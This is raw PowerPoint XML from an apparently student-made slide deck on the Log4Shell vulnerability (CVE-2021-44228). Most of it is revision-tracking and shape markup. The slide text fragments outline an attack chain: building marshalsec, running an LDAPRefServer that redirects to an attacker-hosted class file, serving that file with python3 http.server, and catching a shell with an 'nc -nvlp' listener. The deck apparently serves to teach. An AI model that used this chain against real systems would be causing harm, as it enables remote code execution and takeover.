            <ac:spMk id="6" creationId="{1F5C1B8B-84AF-4219-9B54-8D3B1D58E482}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-11T15:51:40.461" v="1575" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1446588109" sldId="277"/>
            <ac:spMk id="7" creationId="{48276AE3-38D8-4EEA-B573-1C75F5BCB5A6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-11T15:51:29.579" v="1573" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1446588109" sldId="277"/>
            <ac:picMk id="4" creationId="{C0C46F56-4A46-4C61-B547-982EDB03898C}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-11T15:57:34.540" v="1585" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1446588109" sldId="277"/>
            <ac:picMk id="9" creationId="{A942336C-EF2F-4F15-A5CA-68729A4E9A06}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-11T15:57:58.435" v="1593" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1446588109" sldId="277"/>
            <ac:picMk id="11" creationId="{7A979C9C-75C4-4111-95CF-8CBD07AD7405}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-11T15:57:57.013" v="1592" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1446588109" sldId="277"/>
            <ac:picMk id="13" creationId="{7B30C8BC-5D15-429B-83F0-781B95F79B27}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp new del mod">
        <pc:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-12T16:18:29.555" v="1669" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4223011356" sldId="278"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-12T16:18:25.069" v="1668" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4223011356" sldId="278"/>
            <ac:spMk id="2" creationId="{F8C80805-7143-49EF-99F7-EF28DD0C39FC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-12T16:18:23.294" v="1661"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4223011356" sldId="278"/>
            <ac:spMk id="3" creationId="{615C74BF-BA4B-4993-8961-A4AA3DF23132}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod">
        <pc:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-11T15:33:11.687" v="1404" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="373542137" sldId="279"/>
        </pc:sldMkLst>
        <pc:picChg chg="add del mod">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-11T15:32:46.299" v="1400" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="373542137" sldId="279"/>
            <ac:picMk id="3" creationId="{1A9F1ED0-0AFD-4B4E-9029-1432B47DA749}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-11T15:33:11.687" v="1404" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="373542137" sldId="279"/>
            <ac:picMk id="4" creationId="{2A64CEE2-EC19-44C2-A394-0E86C29F0972}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-11T15:27:27.508" v="1399" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3060241310" sldId="280"/>
        </pc:sldMkLst>
        <pc:spChg chg="add del">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-11T15:24:51.845" v="1356" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3060241310" sldId="280"/>
            <ac:spMk id="2" creationId="{BA57EE6D-2FC5-40CA-A444-F3D79C8C46FE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-11T15:24:28.341" v="1349" actId="22"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3060241310" sldId="280"/>
            <ac:spMk id="3" creationId="{BA18E84A-9556-4CC4-B4CD-2779A3245EB1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-11T15:24:51.841" v="1355" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3060241310" sldId="280"/>
            <ac:spMk id="7" creationId="{BC638368-A22E-4B30-8333-D9461BE67E00}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-11T15:24:51.841" v="1355" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3060241310" sldId="280"/>
            <ac:spMk id="8" creationId="{E1123A56-0FC9-4F7E-9EE1-5752CB3F75FA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-11T15:24:34.782" v="1352" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3060241310" sldId="280"/>
            <ac:spMk id="10" creationId="{BC638368-A22E-4B30-8333-D9461BE67E00}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-11T15:25:15.049" v="1368" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3060241310" sldId="280"/>
            <ac:spMk id="11" creationId="{3AB866D9-B58D-4086-81E6-D2307F5B2C97}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-11T15:24:34.782" v="1352" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3060241310" sldId="280"/>
            <ac:spMk id="12" creationId="{E1123A56-0FC9-4F7E-9EE1-5752CB3F75FA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-11T15:25:15.049" v="1368" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3060241310" sldId="280"/>
            <ac:spMk id="13" creationId="{483D304A-009B-42C1-A1B7-B30307638969}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-11T15:25:41.259" v="1378" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3060241310" sldId="280"/>
            <ac:spMk id="17" creationId="{90FFE92F-5760-48FA-9528-6AE7E38E2076}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-11T15:25:11.439" v="1365" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3060241310" sldId="280"/>
            <ac:spMk id="18" creationId="{9D8871FD-61AB-4D2E-9F11-F7C0A9C5B532}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-11T15:25:15.049" v="1367" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3060241310" sldId="280"/>
            <ac:spMk id="20" creationId="{72048B0F-F349-42CF-B22C-19E25B5D2B02}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-11T15:25:15.049" v="1367" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3060241310" sldId="280"/>
            <ac:spMk id="21" creationId="{4677843D-5F25-42FD-B29C-FFD4B2F526A7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-11T15:27:27.508" v="1399" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3060241310" sldId="280"/>
            <ac:spMk id="23" creationId="{9D8871FD-61AB-4D2E-9F11-F7C0A9C5B532}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod ord">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-11T15:25:44.500" v="1379" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3060241310" sldId="280"/>
            <ac:picMk id="5" creationId="{D845A9FD-DCB8-41BC-AD55-F5E1D68569C5}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod">
        <pc:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-11T15:55:50.343" v="1581" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2145799189" sldId="281"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-11T15:41:41.269" v="1442" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2145799189" sldId="281"/>
            <ac:spMk id="3" creationId="{7A246DFD-A202-4688-9673-73363B12BF79}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-11T15:45:25.617" v="1545" actId="255"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2145799189" sldId="281"/>
            <ac:spMk id="5" creationId="{A4DA501A-67CA-4F8B-B843-24E819ECF5D4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-11T15:47:42.188" v="1556" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2145799189" sldId="281"/>
            <ac:spMk id="7" creationId="{476CF4B3-78A2-49F2-9AB2-24ED30F92907}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-11T15:47:34.526" v="1555" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2145799189" sldId="281"/>
            <ac:picMk id="9" creationId="{931DA009-2B71-494A-9086-367BF9FD4B7B}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-11T15:47:22.541" v="1550" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2145799189" sldId="281"/>
            <ac:picMk id="11" creationId="{281CD73F-F138-4B3A-B9A3-A602A35BACD0}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-11T15:55:50.343" v="1581" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2145799189" sldId="281"/>
            <ac:picMk id="13" creationId="{53126311-2A66-4BB4-98FB-4C2953D063F7}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod">
        <pc:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-12T16:24:28.531" v="1731" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3111652230" sldId="282"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-12T16:24:28.531" v="1731" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3111652230" sldId="282"/>
            <ac:spMk id="3" creationId="{3242CC8E-11B0-497C-A9F4-16187D4615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hnad-banat" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/channel/UCdO2LkJKYbldLHcvqboFdr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irrors.rootpei.com/jd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Log4shell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Cve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-2021-44228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DCCE153D-CFA5-43FF-8058-A92C5CBC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5" y="762000"/>
            <a:ext cx="4343400" cy="4343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DDB7E9-9D36-4057-9CBF-B55FE8043267}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4722812" y="2209800"/>
            <a:ext cx="1371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1428BF-A000-4FB4-A82A-718DE746AE59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6094412" y="2057400"/>
            <a:ext cx="3124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46DFD-A202-4688-9673-73363B12BF79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1522412" y="533400"/>
            <a:ext cx="6109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ldap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A501A-67CA-4F8B-B843-24E819ECF5D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1520824" y="1295400"/>
            <a:ext cx="61094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0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="SFMono-Regular"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="SFMono-Regular"/>
              </a:rPr>
              <a:t> apt install maven</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="0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mvn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="10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clean package -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="0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DskipTests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CF4B3-78A2-49F2-9AB2-24ED30F92907}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1370012" y="4038600"/>
            <a:ext cx="10971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java -cp target/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1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marshalsec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1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-0.0.3-SNAPSHOT-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1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all.jar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1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marshalsec.jndi.LDAPRefServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1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"http://&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1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000" b="1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&gt;/#&lt;name(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1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file.class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1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)&gt;"</a:t>
            </a:r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DA009-2B71-494A-9086-367BF9FD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07" y="1905000"/>
            <a:ext cx="10056813" cy="1752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26311-2A66-4BB4-98FB-4C2953D0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00" y="4724400"/>
            <a:ext cx="10893425" cy="12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3E5198-C0C4-4B12-9ECD-068AB395112C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1674812" y="533400"/>
            <a:ext cx="6108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Run any </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>busybox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> httpd </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>python3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> –m </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>http.server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1718B-57DC-4AD4-9F48-F1F1F87DBAF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1751012" y="3716923"/>
            <a:ext cx="76152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listen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>netcat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 err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>nvlp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> &lt;port&gt;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C1B8B-84AF-4219-9B54-8D3B1D58E482}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1674812" y="1219200"/>
            <a:ext cx="3048000" cy="3298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76AE3-38D8-4EEA-B573-1C75F5BCB5A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1674812" y="4348609"/>
            <a:ext cx="2971800" cy="4455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46F56-4A46-4C61-B547-982EDB03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41279"/>
            <a:ext cx="10436225" cy="1278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0C8BC-5D15-429B-83F0-781B95F7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5025237"/>
            <a:ext cx="941201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9934EBD9-4F52-4E6C-B922-15C40ADCAF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1" y="381000"/>
            <a:ext cx="2270592" cy="2286000"/>
          </a:xfr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9713592-05AF-4990-AB5B-1803396C8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3" y="3124200"/>
            <a:ext cx="2627254" cy="26272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DF2D84-6C98-4734-858B-46A50BCC190C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4418012" y="2133600"/>
            <a:ext cx="3200400" cy="1295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277B779F-AF83-4066-959C-C5F493912E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4572000"/>
            <a:ext cx="1346655" cy="137488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68F17B-CCA7-4691-A26B-F15540861184}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2894012" y="2781300"/>
            <a:ext cx="0" cy="156210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200D2D-9DFC-43A1-9702-049CFA9798F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8304212" y="2590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anose="03070402050302030203" pitchFamily="66" charset="0"/>
              </a:rPr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D818A-CFF2-4435-BA2C-C619CB08A9AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4189412" y="381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anose="03070402050302030203" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>attacker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3382B-6670-481E-98B7-4E6359C89DE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2055812" y="6248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radley Hand ITC" panose="03070402050302030203" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>Ldap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Bradley Hand ITC" panose="03070402050302030203" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>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9C263F-58AE-48D1-85C4-7C2CC2E647FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3960812" y="5181600"/>
            <a:ext cx="3691871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97DD26-CE43-411E-9853-E14F175A570E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3884612" y="4800600"/>
            <a:ext cx="373380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130828-0009-46A1-8E5D-966C55C816CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4883085" y="991203"/>
            <a:ext cx="6347023" cy="2685251"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 5241303 w 6347023"/>
              <a:gd name="connsiteY0" fmla="*/ 2685251 h 2685251"/>
              <a:gd name="connsiteX1" fmla="*/ 5967167 w 6347023"/>
              <a:gd name="connsiteY1" fmla="*/ 130587 h 2685251"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 6347023"/>
              <a:gd name="connsiteY2" fmla="*/ 347403 h 2685251"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 6347023"/>
              <a:gd name="connsiteY3" fmla="*/ 347403 h 26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7023" h="2685251">
                <a:moveTo>
                  <a:pt x="5241303" y="2685251"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="6041010" y="1602739"/>
                  <a:pt x="6840718" y="520228"/>
                  <a:pt x="5967167" y="130587"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5093616" y="-259054"/>
                  <a:pt x="0" y="347403"/>
                  <a:pt x="0" y="347403"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="347403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9B0919-1397-4624-BC6F-434190672306}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8532812" y="457200"/>
            <a:ext cx="17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anose="03070402050302030203" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>shell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D3A0C-3CCE-4424-A3AB-3D88B6618E44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
